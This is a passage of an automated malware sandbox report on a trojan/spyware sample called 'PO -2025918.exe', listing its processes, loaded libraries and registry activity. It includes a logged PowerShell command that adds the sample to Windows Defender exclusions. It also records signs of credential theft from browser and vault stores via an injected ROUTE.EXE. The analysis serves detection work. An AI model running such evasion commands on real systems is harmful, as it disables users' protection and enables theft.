                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 032BB970 appears 262 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 0334F290 appears 103 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 03317E54 appears 107 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 0333EA12 appears 86 times
                      Source: PO -2025918.exe, 00000000.00000002.1864286596.0000000000B6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000000.00000002.1865271514.0000000002751000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000000.00000002.1865271514.00000000027A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000000.00000002.1894470547.000000000737C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000000.00000002.1895191077.0000000008C50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000000.00000002.1892212304.0000000007040000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000000.00000000.1692063844.0000000000450000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameobgh.exe< vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000004.00000002.2125457765.0000000001C8D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameroute.exej% vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000004.00000002.2124918917.000000000171A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameroute.exej% vs PO -2025918.exe
                      Source: PO -2025918.exeBinary or memory string: OriginalFilenameobgh.exe< vs PO -2025918.exe
                      Source: PO -2025918.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: PO -2025918.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/7@11/8
                      Source: C:\Users\user\Desktop\PO -2025918.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO -2025918.exe.logJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xct4qmlf.z35.ps1Jump to behavior
                      Source: PO -2025918.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: PO -2025918.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\PO -2025918.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2306045699.0000000002E88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: PO -2025918.exeVirustotal: Detection: 52%
                      Source: PO -2025918.exeReversingLabs: Detection: 57%
                      Source: unknownProcess created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe"
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe"Jump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"Jump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\PO -2025918.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: PO -2025918.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PO -2025918.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: route.pdb source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nWrCyfejRZk.exe, 00000008.00000002.3539862270.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3539737023.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: PO -2025918.exe, PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: route.pdbGCTL source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_07074236 push dword ptr [ebp+01h]; ret 0_2_0707423B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_070879C0 push edx; iretd 0_2_07087AE6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_070876D1 push ebx; iretd 0_2_070876DE
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0708FCA0 push cs; iretd 0_2_0708FCAE
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_07087B01 push esp; iretd 0_2_07087B0E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0708E328 push esp; iretd 0_2_0708E336
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0708E3C6 push ebx; iretd 0_2_0708E3D6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0708826A push cs; iretd 0_2_0708827E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_070882AA push cs; iretd 0_2_070882B6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_07087AA6 push edx; iretd 0_2_07087AE6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_07088101 push A807062Fh; iretd 0_2_0708810D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_070839F2 push esp; iretd 0_2_070839F3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00411A5A push edi; iretd 4_2_00411A5B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00415A13 push esp; ret 4_2_00415A1E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0041623C push edi; retf 4_2_0041623D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0040235F push ds; ret 4_2_0040238E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004143E3 push ebx; ret 4_2_00414440
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004143E3 push edi; retf 4_2_00414477
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0041645E push eax; iretd 4_2_00416462
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0041446E push edi; retf 4_2_00414477
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00414436 push ebx; ret 4_2_00414440
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004034F0 push eax; ret 4_2_004034F2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00404616 push edx; ret 4_2_00404617
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00418EC4 push eax; retf 4_2_00418EC5
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004187CA push esi; ret 4_2_004187D1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B6225F pushad ; ret 4_2_01B627F9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B627FA pushad ; ret 4_2_01B627F9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B909AD push ecx; mov dword ptr [esp], ecx4_2_01B909B6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B6283D push eax; iretd 4_2_01B62858
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B61368 push eax; iretd 4_2_01B61369
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0329225F pushad ; ret 9_2_032927F9
                      Source: PO -2025918.exeStatic PE information: section name: .text entropy: 7.75594454439522

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
